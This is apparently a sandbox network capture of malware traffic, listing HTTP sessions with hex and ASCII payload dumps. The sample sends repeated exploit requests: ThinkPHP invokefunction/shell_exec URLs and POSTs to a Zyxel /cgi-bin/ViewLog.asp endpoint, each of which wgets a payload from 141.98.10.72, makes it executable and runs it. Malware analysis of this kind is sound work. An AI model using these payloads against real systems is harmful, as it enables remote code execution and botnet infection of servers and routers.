                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            522192.168.2.235417888.198.229.24680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:06.102823019 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:06.312727928 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:06 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            523192.168.2.235765894.236.167.2368080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.548226118 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            524192.168.2.235042694.122.217.2108080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.548281908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            525192.168.2.236031094.120.45.898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.548300028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            526192.168.2.234177894.120.34.2368080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.548332930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            527192.168.2.233941031.44.129.1698080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.548388958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            528192.168.2.234423494.121.206.1048080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.548988104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            529192.168.2.234685295.179.189.4880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.589998007 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:08.795357943 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.24.0
                                                            Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            530192.168.2.234173895.217.49.24480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.605035067 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:08.829988956 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            531192.168.2.234321295.100.211.20680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.609039068 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:08.838063002 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 64 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 38 26 23 34 36 3b 35 64 31 35 38 61 31 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4dc91002&#46;1707899348&#46;5d158a16</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            532192.168.2.235017095.86.73.18880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.636255980 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            533192.168.2.235552095.9.93.1780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.651385069 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:08.919920921 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            534192.168.2.234313431.136.166.1588080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.771753073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:09.465698957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:10.841449976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.657061100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:19.292263031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:30.294766903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:52.819619894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:37.869342089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            535192.168.2.235240095.100.79.9380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.791008949 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:08.992228985 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 34 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 38 26 23 34 36 3b 33 33 31 32 33 36 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;847a7b5c&#46;1707899348&#46;3312366</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            536192.168.2.235876094.123.145.1258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.795916080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


